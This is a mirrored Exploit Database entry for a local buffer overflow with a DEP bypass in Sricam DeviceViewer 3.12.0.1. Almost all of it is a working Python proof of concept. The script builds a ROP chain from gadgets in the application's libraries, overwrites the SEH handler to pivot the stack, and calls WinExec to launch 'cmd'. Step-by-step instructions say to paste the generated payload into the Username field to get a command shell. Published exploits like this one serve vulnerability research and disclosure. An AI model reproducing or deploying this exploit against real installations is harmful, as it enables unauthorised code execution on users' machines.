DeviceViewer 3.12.0.1 – ‘add user’ Local Buffer Overflow (DEP Bypass)

• Exploit Database
• 51 阅读

• 作者： Alessandro Magnosi
  日期： 2019-10-09
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47477/

• # Exploit Title: Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)
  # Date: 08/10/2019
  # Exploit Author: Alessandro Magnosi
  # Vendor Homepage: http://www.sricam.com/
  # Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
  # Version: v3.12.0.1
  # Exploit type: Local
  # Tested on: Windows 7 SP1
  
  # Steps to reproduce:
  # 1. Get the WinExec address from arwin.exe kernel32.dll WinExec
  # 2. Change the related address in the PoC
  # 3. Generate the payload using the PoC
  # 4. Log in the Sricam DeviceViewer application
  # 5. Go to System Configuration -> User Management
  # 6. Put the content of the generated file in User Info -> Username
  # 7. Click on Add
  # 8. A command shell will appear
  
  #!/usr/bin/python
  
  from struct import pack, unpack
  
  def create_rop_chain():
  
  rops = [
  
  0x6a1142aa,# XOR EDX,EDX # RETN
  
  0x6a569810,# POP EDX # RETN [avcodec-54.dll] 
  0x6ae9c126,# &Writable location [avutil-50.dll] 
  
  0x6a5dac8a,# POP EAX # RETN
  0xff9b929d,# NEG "cmd\0"
  
  0x6a2420e8,# NEG EAX # RETN [avcodec-54.dll]
  
  0x6994766b,# PUSH EAX # MOV DWORD PTR DS:[EDX],EAX # ADD ESP,3C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avformat-54.dll]
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  
  0x6a18e062,# ADD ESP, 10 # RETN ---> ESI
  0x6a2420ea,# ROP NOP---> EDI 
  
  0x6a45e446,# XCHG EAX,EDX # RETN[avcodec-54.dll] 
  0x6a29d716,# XCHG EAX,ECX # RETN[avcodec-54.dll] 
  
  ##ECX = ascii "cmd\0"
  
  0x6a569810,# POP EDX # RETN [avcodec-54.dll] 
  0x6a36264a,# CALL EBX
   
  ## EDX = CALL EBX
   
  0x6a5dac8a,# POP EAX # RETN
  0x76e33231,# ptr to WinExec() [kernel32.dll]
  #### Unfortunately, this has to be hardcoded as no reliable pointer is available into the aplication
  
  0x6a150411,# XCHG EAX,EBX # RETN [avcodec-54.dll]
  
  ## EBX = &WinExec
  
  0x6a5dac8a,# POP EAX # RETN
  0xffffffff,# -0x00000001-> ebx
  0x6a2420e8,# NEG EAX # RETN [avcodec-54.dll]
  
  ## EAX = 1
  
  0x6a5eb992,# PUSHAD # RETN [avcodec-54.dll]
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  0x6a2420ea,# ROP NOP
  ]
  return ''.join(pack('<I', _) for _ in rops)
  
  
  def nops(length):
  return "\x90" * length
  
  rop_chain = create_rop_chain()
  maxlen = 5000
  
  # Stack pivoting address
  # 0x6a443e58 : {pivot 2252 / 0x8cc} :# ADD ESP,8BC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avcodec-54.dll]
  seh = pack("<I", 0x6a443e58)
  
  # Don't care nseh
  nseh = nops(4)
  
  payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
  sec = maxlen - len(payload)
  payload += nops(sec) # More junk to reach 5000
  
  print("Exploit Length: " + str(len(payload)))
  
  try:
  fname = "exprop.txt"
  exploit = open(fname,"w")
  print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
  print("Author: Alessandro Magnosi\n")
  print("[*] Creating evil username")
  exploit.write(payload)
  exploit.close()
  print("[+] Username file created\n")
  print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>")
  print("[+] A command shell will open")
  except:
  print("[!] Error creating the file")